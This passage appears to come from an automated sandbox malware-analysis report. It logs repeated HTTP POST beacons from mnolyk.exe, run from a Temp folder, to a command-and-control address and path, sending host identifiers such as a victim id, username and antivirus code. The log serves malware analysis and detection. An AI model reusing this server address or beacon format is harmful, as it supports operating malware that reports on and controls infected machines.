                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:33.959949970 CET502INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:33 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          355192.168.2.65007962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:34.128936052 CET503OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:34.192717075 CET503INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:34 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          356192.168.2.65008062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:34.379327059 CET504OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:34.441154957 CET504INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:34 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          357192.168.2.65008162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:34.618170977 CET505OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:34.682039976 CET505INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:34 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          358192.168.2.65008262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:34.890335083 CET506OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:34.954993963 CET506INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:34 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          359192.168.2.65008362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:35.239474058 CET507OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:35.304311991 CET507INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:35 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          36192.168.2.64975462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:59.616651058 CET141OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:59.680761099 CET141INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:59 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          360192.168.2.65008462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:35.626446009 CET508OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:35.689728022 CET508INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:35 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          361192.168.2.65008562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:35.926261902 CET509OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:35.989306927 CET509INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:35 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          362192.168.2.65008662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:36.208343983 CET510OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:36.272155046 CET510INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:36 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          363192.168.2.65008762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:36.507623911 CET511OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:36.572530031 CET511INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:36 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          364192.168.2.65008862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:36.767848969 CET512OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:36.832468033 CET512INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:36 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          365192.168.2.65008962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:37.027587891 CET513OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:37.093354940 CET513INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:37 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          366192.168.2.65009062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:37.310664892 CET514OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:37.373964071 CET514INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:37 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          367192.168.2.65009162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:37.622394085 CET515OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:37.687155008 CET515INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:37 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          368192.168.2.65009262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:37.868052006 CET516OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:37.930119991 CET516INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:37 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          369192.168.2.65009362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:38.122438908 CET517OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:38.187990904 CET517INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:38 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          37192.168.2.64975562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:59.855021000 CET142OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:59.919234037 CET143INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:59 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          370192.168.2.65009462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:38.377723932 CET518OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:38.441557884 CET518INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:38 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          371192.168.2.65009562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:38.620537043 CET519OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:38.684617043 CET519INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:38 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          372192.168.2.65009662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:38.862015009 CET520OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:38.926625967 CET520INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:38 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          373192.168.2.65009762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:39.099670887 CET521OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
